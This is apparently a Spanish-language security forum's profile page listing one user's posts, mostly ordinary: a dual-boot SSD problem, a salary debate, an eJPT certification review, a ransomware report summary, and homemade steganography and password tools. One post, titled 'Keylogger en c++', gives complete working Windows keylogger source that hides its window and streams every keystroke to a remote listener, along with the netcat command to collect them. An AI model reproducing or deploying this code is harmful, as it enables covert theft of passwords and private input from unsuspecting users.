Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - Lautaro Villarreal Culic'

#1
Dudas y pedidos generales / SSD y GRUB no aparecen
Junio 08, 2023, 12:05:44 PM
Compañeros, buenos días.
Tengo un problema con la BIOS? El SSD? No se.
Paso a comentar.
Tengo dos SSD en mi ASUS TUF Fx505DT
Un Intel y SanDisk
En el intel tengo el Windows 10, en el SanDisk hace unos días instalé Debian 11 y tenia el dual boot.
Es decir, el GRUB arrancaba joya.

Hoy enciendo mi PC y resulta que bootea directamente el Windows, dije ah se eligió automáticamente, aunque de ser el caso arranca el Debian.

Booteo denuevo y en el menu del boot ya no sale el SanDisk, en la BIOS tampoco.
En Windows (desde el explorador de archivos), no figura (anoche figuraba vacío) un segundo disco.

PERO en el MiniTool Partition Wizard si se puede ver el SanDisk, estan las particiones de Linux y todo normal.


Qué puede ser?

Paso a comentar un detalle no menor: Tenia pensado instalar Windows 11 sobre el 10 desde la usb, es decir, al Disco de Intel. Me bajé sin querer el asistente del instalador de W11 y no el creador de medios USB y lo ejecuté, aunque ni había arrancado casi la ejecución y lo quité.
Será que sobre escribió en esos segundos el boot manager? De ser el caso, por que no se ve el SSD de SanDisk en la BIOS (la cual ya reinstalé el firmware y nada)?

Saludos
#2
Hola compañeros, que tal. Hace unos días con un colega nos surgió este debate (en mi caso omitiré opinión).
Antes que nada me gustaría aclarar algo: Sé que es un debate ambiguo y que en el caso del Desarrollador principalmente depende de las tecnologías, experiencia para ambos rubros y certificaciones para el caso del Ethical Hacking.

Por lo que tomaremos como muestra 4 años de experiencia para cada individuo. El salario es el del mercado internacional/EEUU.
Las tecnologías del Desarrollador están más orientadas al Backend. Podríamos agarrar el stack de python, django y postgressql.
Mientras que el Ethical Hacker/Pentester contaría con el OSCP, CEH, eCPPT.
La empresa es la misma.

Dejando un par de cabos atados, ¿cuál creen que tendría el salario más alto?
Si tienen fuentes, sería un golazo que las dejen debajo de su respuesta porque me gustaría escribir una especie de conclusión final con sus opiniones también.


Saludos!
#3
Hola Underc0ders,
Hace unos días hice un pendrive booteable con la imagen de Kali Linux para hacer una instalación gráfica. Todo salió bien, perfecto.
La imagen estaba en el escritorio, y terminado todo el proceso intento eliminarla.
Cuando le doy a suprimir, queda cargando la barra (por horas, ya lo probé) y no lo borra.
Intenté hacerlo desde el cmd con permisos de administrador pero tampoco, se queda pensando.
Reinicié la PC y todo, pero nada. Ya no sé que más probar -es la primera vez que me pasa-, así que recurro a la creatividad de ustedes para que me den una manito.



Saludos!
#4
Hacking / 168 repositorios en GitHub de Red Team
Noviembre 11, 2022, 03:44:45 PM
Hola Underc0ders, quería compartirles 168 repositorios de GitHub vinculados en su gran mayoría con el Red Team.
Por lo que me tomaré el tiempo de pasarles cada uno de ellos!

1 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
2 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
3 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
4 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
5 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
6 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
7 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
8 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
9 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
10 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
11 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
12 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
13 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
14 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
15 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
16 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
17 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
18 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
19 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
20 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
21 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
22 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
23 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
24 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
25 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
26 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
27 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
28 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
29 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
30 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
31 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
32 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
33 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
34 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
35 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
36 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
37 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
38 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
39 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
40 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
41 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
42 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
43 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
44 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
45 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
46 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
47 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
48 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
49 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
50 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
51 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
52 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
53 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
54 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
55 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
56 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
57 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
58 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
59 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
60 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
61 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
62 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
63 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
64 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
65 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
66 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
67 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
68 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
69 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
70 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
71 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
72 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
73 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
74 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
75 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
76 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
77 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
78 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
79 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
80 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
81 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
82 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
83 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
84 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
85 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
86 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
87 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
88 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
89 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
90 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
91 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
92 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
93 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
94 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
95 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
96 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
97 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
98 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
99 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
100 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
101 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
102 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
103 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
104 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
105 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
106 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
107 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
108 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
109 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
110 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
111 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
112 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
113 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
114 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
115 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
116 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
117 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
118 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
119 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
120 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
121 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
122 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
123 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
124 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
125 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
126 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
127 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
128 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
129 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
130 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
131 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
132 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
133 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
134 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
135 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
136 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
137 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
138 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
139 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
140 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
141 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
142 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
143 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
144 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
145 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
146 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
147 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
148 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
149 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
150 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
151 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
152 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
153 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
154 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
155 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
156 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
157 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
158 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
159 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
160 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
161 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
162 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
163 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
164 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
165 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
166 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
167 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------
168 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
-----------------------------------------------------------------


Espero que les sea de utilidad.
Les animo a que compartan sus repositorios de interés o propios!

Saludos!
#5
Los grupos de ransomware siguen creciendo en volumen y sofisticación. Desde 2019, ha aumentado en un 466%, y es que, se está empleando como precursor de la guerra física, como se ha puesto de manifiesto en el conflicto de Rusia en Ucrania.

Así lo desprende el informe Ransomware Report del 3º trimestre del 2022, de Ivanti, realizado en colaboración con Cyber Security Works y Cyware. El informe identificó 10 nuevas familias de ransomware, lo que representa un total de 170.



"Los equipos de TI y de ciberseguridad deben adoptar urgentemente una estrategia basada en el riesgo para la gestión de las vulnerabilidades, con el fin de defenderse mejor contra este tipo de amenazas", asegura Srinivas Mukkamala, director de Producto de Ivanti.

Estado del ransomware

El ransomware necesita de la interacción humana, y es un mito pensar que el phishing es el único vector de ataque. Para conocer con exactitud las tácticas, técnicas y procedimientos que pueden utilizarse para comprometer a una organización, en el marco MITRE ATT&CK se analizaron y mapearon 323 vulnerabilidades de ransomware.

El resultado fue que 57 de ellas provocaron una toma de control completa del sistema, desde el acceso inicial a la exfiltración.

El Ransomware Report del 3º trimestre del 2022, revela que este delito informático aumentó un 466% desde 2019, y que está empezando a ser utilizado como precursor de la guerra física

En 2021, el 16 % de los encuestados informaron que no tenían un plan de recuperación ante desastres. En 2022, esta cifra crece hasta el 19 %, a pesar del aumento de los ataques.

"Los ataques a las empresas están aumentando y existe una sorprendente falta de conciencia y preparación por parte de los profesionales de IT. Nuestra encuesta muestra que muchos miembros de la comunidad IT tienen una falsa sensación de seguridad", comenta Daniel Hofmann, CEO de Hornetsecurity.

El estudio desveló también la existencia de dos nuevas vulnerabilidades (CVE-2021-40539 y CVE-2022-26134), ambas explotadas por prolíficas familias de este malware como AvosLocker y Cerber, bien sea antes o el mismo día en que fueron incorporadas a la Base Nacional de Vulnerabilidades (NVD) de Estados Unidos.

El hecho de que los escáneres más conocidos no detecten la totalidad de las vulnerabilidades, es un claro ejemplo de que su gestión debe evolucionar e ir más allá de las prácticas tradicionales.

El informe analizó también el impacto de esta modalidad de ataque en las infraestructuras críticas, resultando la sanidad, la energía y la fabricación crítica los tres sectores más afectados. Y reveló que el 47,4 % de las vulnerabilidades del ransomware afectan a los sistemas sanitarios, el 31,6 % a los sistemas energéticos y el 21,1 % a la fabricación crítica.


Fuentes:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#6
Buenas underc0ders, quería compartirles mi experiencia con el curso del eJPT (gratuito) y la certificación (200 USD).

El día 13 de Julio por la madrugada obtuve la certificación eJPT, la cual hasta el día de hoy la considero como un primer paso de una serie de certificaciones que tengo planeado seguir.

Esta podemos dividirla en dos partes. La primera es la preparación, esta es opcional, es decir, no es necesario hacerlo para poder rendir el examen, aunque considero que para los que estamos empezando sería una muy buena idea tomar el curso. Ya que es gratuito con el Starter Pass de INE, solo debemos registrarnos No tienes permitido ver los links. Registrarse o Entrar a mi cuenta. En cambio la certificación es impartida por eLearnSecurity No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, a un costo razonable.



El curso (PTS)
La preparación para el examen se divide en tres partes, Penetration Testing Prerequisites -> Penetration Testing: Preliminary Skills & Programming -> Penetration Testing Basics.

Primera parte


Segunda parte


Tercera parte


Penetration Testing Prerequisites
En esta parte se ve las bases de los protocolos, networking, cookies, routing, etc. Contamos con un lab de Burpsuite, uno de exfiltración de datos, de routing y wireshark.

Debido a que este curso fue hecho en 2015, hay algunas características en herramientas como Burpsuite que no la tenemos hoy en la versión community, como el Spider.

Penetration Testing: Preliminary Skills & Programming
Por otro lado, en la segunda parte veremos (de forma muy básica) programación en C++, Python y Bash.

Las prácticas son muy buenas, aunque si no tenes experiencia en programación puede que se vuelva un poco difícil, ya que tratarás con sockets. En unos de los labs por ejemplo tendrás que hacer un Keylogger en C++.

Penetration Testing Basics
Lo bonito al final y eso INE lo entiende muy bien. En esta última parte veremos metodología de pentesting, escaneos con Nessus, Nmap, enumeraciones, cracking de hashes, explotaciones con Metasploit, google hacking, los verbos HTTP, explotaciones XSS, SQL, etc.

Considero que es muy completa, cada técnica muy bien explicada con su respectiva área de práctica. Teniendo en cuenta que desde hace unos meses este curso está 100% gratuito, no hay nada en lo que se pueda mejorar. Teniendo en cuenta que esta preparación es para personas iniciadas en el Pentesting.

En general...
La duración de este es de 38 horas aproximadamente.

Cada laboratorio contiene un archivo VPN en el que te conectas mediante openVPN con el usuario y clave que INE te proporciona.

Recomiendo tomarlo por más que no le interese hacer la certificación, y más aún si está iniciando en la ciberseguridad (aunque considero que hay mini conceptos que deben conocerse previamente).

El examen (eJPT)
eLearnSecurity es muy generoso con el tiempo de entrega del examen, nos provee 72 horas para responder correctamente un mínimo de 15 preguntas sobre 20. Son preguntas con opciones múltiples de respuesta (multiple choice).

En caso de que les vaya mal no se desanimen porque tendremos una oportunidad de volver a realizar el examen de forma gratuita.

Por más que el examen tenga sus años, todas las herramientas que hoy tenemos actualizadas pueden usarse perfectamente.

El examen puede realizarse con el contenido del curso, no se pondrá en prueba nada que no esté en el PTS.

Tanto INE como eLearnSecurity nos aclaran que no se trata de un CTF, y en cierto modo tienen razón en el caso del examen. Aunque en el PTS parezca que a veces hay que buscarle la vuelta a las soluciones y algunas de estas es difícil de ver en un entorno real (sobre todo en unas de las Black-box labs del final de la tercera parte, donde encontramos credenciales de una base de datos en la respuesta de los Headers).

Algunos consejos
No tengan miedo de ver las soluciones en los laboratorios, estos están hechos para que nosotros aprendamos, no para hacerlo bien a la primera. Hazlos la cantidad de veces que sea necesarias hasta que te quede claro lo que estás haciendo.


  • Lean TODAS las preguntas (y bien) antes de comenzar el examen.
  • Háganse un pequeño .txt con los comandos que usaron en los labs (sobre todo en los últimos 3).
  • Tómate tu tiempo. Si estás atascado ponte a hacer otras cosas y luego vuelve.
  • Asegurate de enumerar bien los hosts y prestar atención a los resultados.
  • Recuerda que para que un pentesting sea exitoso la clave está en recopilar toda la información posible.
  • Si en algún momento tenes la sensación de que algo no tiene sentido, puede que sea lo correcto.

CitarClaramente esta certificación no hará que te lluevan ofertas de empleo, es más bien una puerta que considero necesario cruzar para seguir con otras certificaciones como el eCPPT, eWPTX, entre otras.

Imagina una escalera de certificaciones, el eJPT es el primer escalón.

Espero que les haya servido, sobre todo si están ingresando al mundo de la ciberseguridad y están buscando algún curso práctico y con un examen  ;D ;D
#7
Hacking / Keylogger en c++
Mayo 10, 2021, 02:50:20 AM
Hola muchachos, estoy repasando algunas cosas en C++ enfocado a la seguridad informática en general y me parece una buena idea dejarles el código de un Keylogger muy simple :D

Código: text

#define _WINSOCK_DEPRECATED_NO_WARNINGS
#pragma comment(lib, "Ws2_32.lib")
#include <iostream>
#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <Windows.h>

int main(){

    ShowWindow(GetConsoleWindow(), SW_HIDE);
    char KEY;

    WSADATA WSAData;
    SOCKET server;
    SOCKADDR_IN addr;


    WSAStartup(MAKEWORD(2, 0), &WSAData);
    server = socket(AF_INET, SOCK_STREAM, 0);
    addr.sin_addr.s_addr = inet_addr("IP DEL SERVIDOR"); //IP DEL SERVIDOR (Oyente).
    addr.sin_family = AF_INET;
    addr.sin_port = htons(5555); //Puerto de comunicación.
    connect(server, (SOCKADDR *)&addr, sizeof(addr));


        while(true){
            Sleep(10);
            for (int KEY = 0x8; KEY < 0xFF; KEY++){
               
                if (GetAsyncKeyState(KEY) == -32767){

                        char buffer[2];
                        buffer[0] = KEY;
                        send(server, buffer, sizeof(buffer), 0);
                }
            }
        }

        closesocket(server);
        WSACleanup();
}



EDIT:
Y si se preguntan... ok, pongo mi IP y el puerto está en el 5555. Como veo las pulsaciones?
Pueden hacerlo con netcat.
En linux, escriben el comando
Código: text

sudo nc -lvp 5555

Y dejan la sesión abierta.

Saludos!
#8
Buenas tardes gente, aquellos que la tengan clara en redes y comunicaciones, quiero comprarme un usb wifi, tengo dos en mira.
Uno tiene un chipset Atheros 9271 y el otro un Ralink 3070.
Estuve leyendo que el Atheros 9271 es muy bueno para inyección, modo monitor (para hacer auditorías en general) y el Ralink 3070 me comentan que es lo mismo pero más potente, es esto cierto? en todo caso sería el Ralink 3070 mejor que el Atheros 9271?


Saludos!!
#9
Buenas tardes Underc0ders! Hace unas semanas arranqué un proyecto de esteganografía, una rama de la criptografía. Básicamente consiste en el ocultamiento de archivos dentro de algún contenido multimedia generalmente.
El más popular (además de salir en Mr Robot) fue DeepSound, que hace estas cosas pero en lugar de utilizar una imagen para portar la información es a través de archivos de sonidos .wav (si mal no recuerdo).
zStego es una herramienta de esteganografía para el ocultamiento de archivos y textos dentro de una imagen. Programada en .NET con Visual Basic.


Es muy sencillo utilizar zStego, tiene funciones básicas.
Encriptar un archivo (cualquier archivo, con cualquier extensión pero que respete la capacidad para que sea almacenado en la imagen) o un texto a modo de "descripción" del archivo.
En el .zip se encuentra el famoso README agradeciendo a Underc0de y además se encuentra la contraseña generada por zPassword (mi anterior proyecto), esta contraseña sirve para descifrar el texto oculto dentro del .png que se encuentra dentro de la carpeta de zStego.

Les dejo una captura:



A continuación les dejo los links de virus total de los 4 archivos. El .zip la imagen .png el .txt y el .exe

.zip: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
.png: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
.txt: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
.exe: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Ahora el virustotal del link de descarga directo

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

LINKS DE DESCARGA

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Unas recomendaciones para evitar problemas:

> Tener .NET Framework 4.6 instalado

La imagen para encriptar debe ser .JPG, dependiendo de su capacidad de encriptado, dependerá el límite de tamaño del archivo que elegimos para encriptar.
Algunas fotografías entregadas por la NASA pueden pesar hasta 300 megas.
Cuando guardemos esta imagen, será en .PNG
Si decidimos compartir la imagen, cuidado. Si este .PNG pasa por alguna red social o es enviada por WhatsApp por ejemplo, esta perderá todo lo que contenga. Ya que cambiará el formato de esta y en muchas ocasiones los metadatos son borrados.
Lo recomendable es enviarla (a la imagen ya encriptada) como archivo, por ejemplo mediante correo electrónico, colocarla en alguna web, pasarla por Bluetooh, etc.
Tampoco servirá si la imagen encriptada .PNG es convertida a .JPG y posteriormente .PNG

En resumen, la imagen no puede perder su formato .PNG ni tampoco deben ser limpiados sus metadatos.

Como ya es de costumbre, a continuación les dejo post de mis anteriores herramientas por si quieren verlos:
zPassword: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
zPort: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
zTool: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Obviamente mis anteriores proyectos tienen errores fatales de programación, la idea es ir mejorando proyecto tras proyecto jajaja  ;D ;D


Muchas gracias a todos!!!
#10
Buenos días Underc0ders!
Anoche un miembro por el grupo de WhatsApp pasó una captura de un script en python con un generador de contraseñas y me recordó que había hecho uno en Java hace tiempo a medio hacer, era un desastre cuando abrí el proyecto hoy temprano. Así que decidí pasarlo a Visual Basic desde cero y bien hecho  ::)

Es muy simple, y solo se requiere .NET Framework > 4.5.2 (Windows)

Una captura:





VirusTotal:
- URL: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- ZIP: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


DESCARGA:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Que la disfruten!!

PD: Tengo otras dos herramientas publicadas desde hace tiempo en el foro, por si están aburridos péguenle un vistazo
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#11
